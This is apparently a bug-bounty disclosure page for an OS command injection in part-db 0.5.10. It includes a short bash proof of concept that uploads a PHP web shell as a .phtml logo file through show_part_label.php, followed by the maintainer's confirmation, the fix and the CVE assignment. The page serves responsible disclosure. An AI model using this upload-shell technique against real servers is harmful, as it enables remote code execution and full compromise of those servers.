OS Command Injection in part-db/part-db

Valid

Reported on

Feb 15th 2022


Description

OS command injection (also known as shell injection) is a web security vulnerability that allows an attacker to execute arbitrary operating system (OS) commands on the server that is running an application, and typically fully compromise the application and all its data. Very often, an attacker can leverage an OS command injection vulnerability to compromise other parts of the hosting infrastructure, exploiting trust relationships to pivot the attack to other systems within the organization.

Proof of Concept

#!/bin/bash

host=127.0.0.1/Part-DB-0.5.10 #WEBHOST

echo "<?php system(id); ?>">POC.phtml  #PHP Shell Code

result=`curl -i -s -X POST -F "logo_file=@POC.phtml" "http://$host/show_part_label.php" | grep -o -P '(?<=value="data/media/labels/).*(?=" > <p)'`

rm POC.phtml

echo Shell Location : "$host/data/media/labels/$result"

Shell PATH

Impact

If successfully exploited OS Command Injection could allow an attacker or malicious user command execution on the target with the same permissions as the exploited web server. Depending on the configuration of the target, and level of security hardening that has been conducted (or lack there of) successful exploitation of this vulnerability could, potentially result in the attacker gaining complete control of the vulnerable system, exfiltrating sensitive data or performing privilege escalation / lateral movement.

We are processing your report and will contact the part-db team within 24 hours. 3 months ago
We have contacted a member of the part-db team and are waiting to hear back 3 months ago
We have sent a follow up to the part-db team. We will try again in 7 days. 3 months ago
We have sent a second follow up to the part-db team. We will try again in 10 days. 3 months ago
Jan Böhmer validated this vulnerability 3 months ago
Sunny Mehra has been awarded the disclosure bounty
The fix bounty is now up for grabs
Jan Böhmer
3 months ago

Maintainer


The possibility of the exploit depends somewhat on the server config (interpreting phtml as php file). The main problem is that Part-DB currently only block .php files, and not other potentialy unsafe extensions as well. I will fix that

Jan Böhmer confirmed that a fix has been merged on 9cd4ee 3 months ago
Jan Böhmer has been awarded the fix bounty
Sunny Mehra
3 months ago

Researcher


@admin and @maintainer Please assign CVE ID if applicable.

Jamie Slome
3 months ago

Admin


We are happy to assign a CVE, we just require the approval of the maintainer before we can action for you.

@maintainer - are you happy for us to assign and publish a CVE for this report?

Jan Böhmer
3 months ago

Maintainer


@admin Yes, its okay.

Jamie Slome
3 months ago

Admin


CVE assigned and published! 🎊

Sunny Mehra
3 months ago

Researcher


Thank you soo much @admin and @mainainer

Sunny Mehra
3 months ago

Researcher


@Maintainer

to join this conversation